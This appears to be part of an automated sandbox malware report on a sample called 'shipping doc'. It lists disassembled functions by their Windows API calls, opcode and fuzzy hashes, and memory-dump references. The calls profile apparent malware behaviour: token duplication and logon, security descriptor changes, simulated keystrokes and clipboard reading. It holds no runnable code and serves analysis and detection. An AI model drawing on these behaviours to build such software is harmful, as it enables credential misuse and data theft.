                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fread_nolock
                                                                                              • String ID:
                                                                                              • API String ID: 2638373210-0
                                                                                              • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                                                              • Instruction ID: f58e2585afcf31cea2c50b289b9bc2e3ae708c2cae1b58f80dc6a20fccb3b5c3
                                                                                              • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                                                              • Instruction Fuzzy Hash: A0E048B16097009FDF395A28A8517B677D49F4A301F00085EF9AB97252E6726845864D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000E3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 000E3908
                                                                                                • Part of subcall function 000ED730: GetInputState.USER32 ref: 000ED807
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 000E2B6B
                                                                                                • Part of subcall function 000E30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 000E314E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                              • String ID:
                                                                                              • API String ID: 3667716007-0
                                                                                              • Opcode ID: db1b2cb19e1d1e72a2fbffa50e85c60f5825c7956e80d6b92379073b2086ed93
                                                                                              • Instruction ID: 4b455fa54bdde84d70b3aa663f8008ab3b7458c67ffcc36eead66e26213681c9
                                                                                              • Opcode Fuzzy Hash: db1b2cb19e1d1e72a2fbffa50e85c60f5825c7956e80d6b92379073b2086ed93
                                                                                              • Instruction Fuzzy Hash: 4BE026213042C41FC608BB32A86A4EDBB599BD1311F80053EF08273163CF2089854351
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(00000000,00000000,?,00120704,?,?,00000000,?,00120704,00000000,0000000C), ref: 001203B7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 24a04cfc24865ee13f04003916b64027eeda2cf5750df433686c2c6920333d64
                                                                                              • Instruction ID: 86ac1e53c0dec05b2591d057e9542579eb3b9b194cd6863d17bcd95a800418ca
                                                                                              • Opcode Fuzzy Hash: 24a04cfc24865ee13f04003916b64027eeda2cf5750df433686c2c6920333d64
                                                                                              • Instruction Fuzzy Hash: 98D06C3204010DFBDF029F84DD06EDA3BAAFB48714F014050BE1856020C732E8A1AB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 000E1CBC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoParametersSystem
                                                                                              • String ID:
                                                                                              • API String ID: 3098949447-0
                                                                                              • Opcode ID: e7273f9e2104c3c4178c5afa2e9d50bb2772ca15ea080fc457e00e4f478bb1e0
                                                                                              • Instruction ID: e8f532daeef6f2bded6372a7aa16c6c0b521c00f34aaddd44af665d477328e52
                                                                                              • Opcode Fuzzy Hash: e7273f9e2104c3c4178c5afa2e9d50bb2772ca15ea080fc457e00e4f478bb1e0
                                                                                              • Instruction Fuzzy Hash: 5EC09236380305AFF2248B80BC5AF5077A4B348B10F488101F60DA9DF3D3B228E0EB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000E5745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,000E949C,?,00008000), ref: 000E5773
                                                                                              • GetLastError.KERNEL32(00000002,00000000), ref: 001576DE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateErrorFileLast
                                                                                              • String ID:
                                                                                              • API String ID: 1214770103-0
                                                                                              • Opcode ID: 4ea7f3ef25b2b5f15ab26c247883b72ec4774a2d8d5607c6c9fcd302e23ed341
                                                                                              • Instruction ID: a099c3cb0bce5a5e8e455a5452f4ecc2f25190e8b3ed36076ac429494409d577
                                                                                              • Opcode Fuzzy Hash: 4ea7f3ef25b2b5f15ab26c247883b72ec4774a2d8d5607c6c9fcd302e23ed341
                                                                                              • Instruction Fuzzy Hash: 5681A130208741DFD714EF29D492BA9B7E1AF89314F04451DF8A66B2E2DB30ED49CB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                              • Instruction ID: f971081f3f58a7d472436e2bbd5a7163909c7280f6cf47e4e0ca5e335f76907a
                                                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                              • Instruction Fuzzy Hash: F231F574A0010EDBD768CF59D580979FBA2FF89304B2486A5EA09CBA55D731EDC1EBC0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • Sleep.KERNELBASE(000001F4), ref: 01822311
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1781184900.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1820000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                              • Instruction ID: 2492cc75caf07523ae22bf24ed115d2013ca9229ea993122352201d64480462e
                                                                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                              • Instruction Fuzzy Hash: CBE0E67494010DDFDB00EFB4D94D69E7FB4EF04301F100661FD01D2281D6309E509A62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000F9BB2
                                                                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0017961A
                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0017965B
                                                                                              • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0017969F
                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001796C9
                                                                                              • SendMessageW.USER32 ref: 001796F2
                                                                                              • GetKeyState.USER32(00000011), ref: 0017978B
                                                                                              • GetKeyState.USER32(00000009), ref: 00179798
                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001797AE
                                                                                              • GetKeyState.USER32(00000010), ref: 001797B8
                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001797E9
                                                                                              • SendMessageW.USER32 ref: 00179810
                                                                                              • SendMessageW.USER32(?,00001030,?,00177E95), ref: 00179918
                                                                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0017992E
                                                                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00179941
                                                                                              • SetCapture.USER32(?), ref: 0017994A
                                                                                              • ClientToScreen.USER32(?,?), ref: 001799AF
                                                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 001799BC
                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001799D6
                                                                                              • ReleaseCapture.USER32 ref: 001799E1
                                                                                              • GetCursorPos.USER32(?), ref: 00179A19
                                                                                              • ScreenToClient.USER32(?,?), ref: 00179A26
                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00179A80
                                                                                              • SendMessageW.USER32 ref: 00179AAE
                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00179AEB
                                                                                              • SendMessageW.USER32 ref: 00179B1A
                                                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00179B3B
                                                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00179B4A
                                                                                              • GetCursorPos.USER32(?), ref: 00179B68
                                                                                              • ScreenToClient.USER32(?,?), ref: 00179B75
                                                                                              • GetParent.USER32(?), ref: 00179B93
                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00179BFA
                                                                                              • SendMessageW.USER32 ref: 00179C2B
                                                                                              • ClientToScreen.USER32(?,?), ref: 00179C84
                                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00179CB4
                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00179CDE
                                                                                              • SendMessageW.USER32 ref: 00179D01
                                                                                              • ClientToScreen.USER32(?,?), ref: 00179D4E
                                                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00179D82
                                                                                                • Part of subcall function 000F9944: GetWindowLongW.USER32(?,000000EB), ref: 000F9952
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00179E05
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                              • String ID: @GUI_DRAGID$F
                                                                                              • API String ID: 3429851547-4164748364
                                                                                              • Opcode ID: ccf67c747331e33b0be9c9b092d860ee6d27fd74067774cc4812c971d035fd2c
                                                                                              • Instruction ID: 1268ddb51f96535b40e6e7e03519d52c9f2f9f07aecb04be9ef1fa0cd5a86f89
                                                                                              • Opcode Fuzzy Hash: ccf67c747331e33b0be9c9b092d860ee6d27fd74067774cc4812c971d035fd2c
                                                                                              • Instruction Fuzzy Hash: FD429C74204241AFDB24CF24CC84AAABBF5FF49314F11861DF69D976A1D731A898CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 001748F3
                                                                                              • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00174908
                                                                                              • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00174927
                                                                                              • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0017494B
                                                                                              • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0017495C
                                                                                              • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0017497B
                                                                                              • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 001749AE
                                                                                              • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 001749D4
                                                                                              • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00174A0F
                                                                                              • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00174A56
                                                                                              • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00174A7E
                                                                                              • IsMenu.USER32(?), ref: 00174A97
                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00174AF2
                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00174B20
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00174B94
                                                                                              • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00174BE3
                                                                                              • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00174C82
                                                                                              • wsprintfW.USER32 ref: 00174CAE
                                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00174CC9
                                                                                              • GetWindowTextW.USER32(?,00000000,00000001), ref: 00174CF1
                                                                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00174D13
                                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00174D33
                                                                                              • GetWindowTextW.USER32(?,00000000,00000001), ref: 00174D5A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                              • String ID: %d/%02d/%02d
                                                                                              • API String ID: 4054740463-328681919
                                                                                              • Opcode ID: e9b25949cfb2ea3e8e7e9411daf109dd53f2ca414505886534370744fbe00912
                                                                                              • Instruction ID: b54e21ba96acb3fa94f4023aab3a46688be63e7040f8d7c32820e4e6c3d16cd1
                                                                                              • Opcode Fuzzy Hash: e9b25949cfb2ea3e8e7e9411daf109dd53f2ca414505886534370744fbe00912
                                                                                              • Instruction Fuzzy Hash: 9E12A071600259ABEB258F68CC49FEE7BF8AF45710F108129F51AEB2E1DB749981CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 000FF998
                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0013F474
                                                                                              • IsIconic.USER32(00000000), ref: 0013F47D
                                                                                              • ShowWindow.USER32(00000000,00000009), ref: 0013F48A
                                                                                              • SetForegroundWindow.USER32(00000000), ref: 0013F494
                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0013F4AA
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0013F4B1
                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0013F4BD
                                                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 0013F4CE
                                                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 0013F4D6
                                                                                              • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0013F4DE
                                                                                              • SetForegroundWindow.USER32(00000000), ref: 0013F4E1
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0013F4F6
                                                                                              • keybd_event.USER32(00000012,00000000), ref: 0013F501
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0013F50B
                                                                                              • keybd_event.USER32(00000012,00000000), ref: 0013F510
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0013F519
                                                                                              • keybd_event.USER32(00000012,00000000), ref: 0013F51E
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0013F528
                                                                                              • keybd_event.USER32(00000012,00000000), ref: 0013F52D
                                                                                              • SetForegroundWindow.USER32(00000000), ref: 0013F530
                                                                                              • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0013F557
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                              • String ID: Shell_TrayWnd
                                                                                              • API String ID: 4125248594-2988720461
                                                                                              • Opcode ID: e17466215dc916c9c8e62d444e02f3fd76a3515793eff1e3ea1ed551fc7879d8
                                                                                              • Instruction ID: ffd468cce9b8557516ccd6b325a060b8006b9e009f33e8aea7ee2e9d5acac2a6
                                                                                              • Opcode Fuzzy Hash: e17466215dc916c9c8e62d444e02f3fd76a3515793eff1e3ea1ed551fc7879d8
                                                                                              • Instruction Fuzzy Hash: 95313071B40218BBEB206BB55C4AFBF7E7CEB44B50F104069FA05EA1D1D7B15D81AEA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 001416C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0014170D
                                                                                                • Part of subcall function 001416C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0014173A
                                                                                                • Part of subcall function 001416C3: GetLastError.KERNEL32 ref: 0014174A
                                                                                              • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00141286
                                                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 001412A8
                                                                                              • CloseHandle.KERNEL32(?), ref: 001412B9
                                                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 001412D1
                                                                                              • GetProcessWindowStation.USER32 ref: 001412EA
                                                                                              • SetProcessWindowStation.USER32(00000000), ref: 001412F4
                                                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00141310
                                                                                                • Part of subcall function 001410BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001411FC), ref: 001410D4
                                                                                                • Part of subcall function 001410BF: CloseHandle.KERNEL32(?,?,001411FC), ref: 001410E9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                              • String ID: $default$winsta0
                                                                                              • API String ID: 22674027-1027155976
                                                                                              • Opcode ID: 48264d05800136e957bfc18338997ed51749ce1c6002c2a63bb1e015cff92300
                                                                                              • Instruction ID: 87ea4d886ab63bbc70e5b5d15210d62107e7d65af7e2100777bde6cbe9b99a80
                                                                                              • Opcode Fuzzy Hash: 48264d05800136e957bfc18338997ed51749ce1c6002c2a63bb1e015cff92300
                                                                                              • Instruction Fuzzy Hash: 12817971900209BBDF219FA4DC49FEE7BB9EF08704F184129FA15A62A0D7759AC4CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 001410F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00141114
                                                                                                • Part of subcall function 001410F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00140B9B,?,?,?), ref: 00141120
                                                                                                • Part of subcall function 001410F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00140B9B,?,?,?), ref: 0014112F
                                                                                                • Part of subcall function 001410F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00140B9B,?,?,?), ref: 00141136
                                                                                                • Part of subcall function 001410F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0014114D
                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00140BCC
                                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00140C00
                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00140C17
                                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00140C51
                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00140C6D
                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00140C84
                                                                                              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00140C8C
                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00140C93
                                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00140CB4
                                                                                              • CopySid.ADVAPI32(00000000), ref: 00140CBB
                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00140CEA
                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00140D0C
                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00140D1E
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00140D45
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00140D4C
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00140D55
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00140D5C
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00140D65
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00140D6C
                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00140D78
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00140D7F
                                                                                                • Part of subcall function 00141193: GetProcessHeap.KERNEL32(00000008,00140BB1,?,00000000,?,00140BB1,?), ref: 001411A1
                                                                                                • Part of subcall function 00141193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00140BB1,?), ref: 001411A8
                                                                                                • Part of subcall function 00141193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00140BB1,?), ref: 001411B7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                              • String ID:
                                                                                              • API String ID: 4175595110-0
                                                                                              • Opcode ID: 520e6ad2f0a8d47d3edd3b4f077633a72b23bd0c7bcb7bc7684e94766a02e54e
                                                                                              • Instruction ID: fdafa3ed0508185c93aeb6f7111c19ffa1c4be41e0499d8c7e25486f317da881
                                                                                              • Opcode Fuzzy Hash: 520e6ad2f0a8d47d3edd3b4f077633a72b23bd0c7bcb7bc7684e94766a02e54e
                                                                                              • Instruction Fuzzy Hash: 97716075900209EBDF11DFE5DC44FAEBBB8BF08310F144529FA18A7161D771AA85CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • OpenClipboard.USER32(0017CC08), ref: 0015EB29
                                                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 0015EB37
                                                                                              • GetClipboardData.USER32(0000000D), ref: 0015EB43
                                                                                              • CloseClipboard.USER32 ref: 0015EB4F
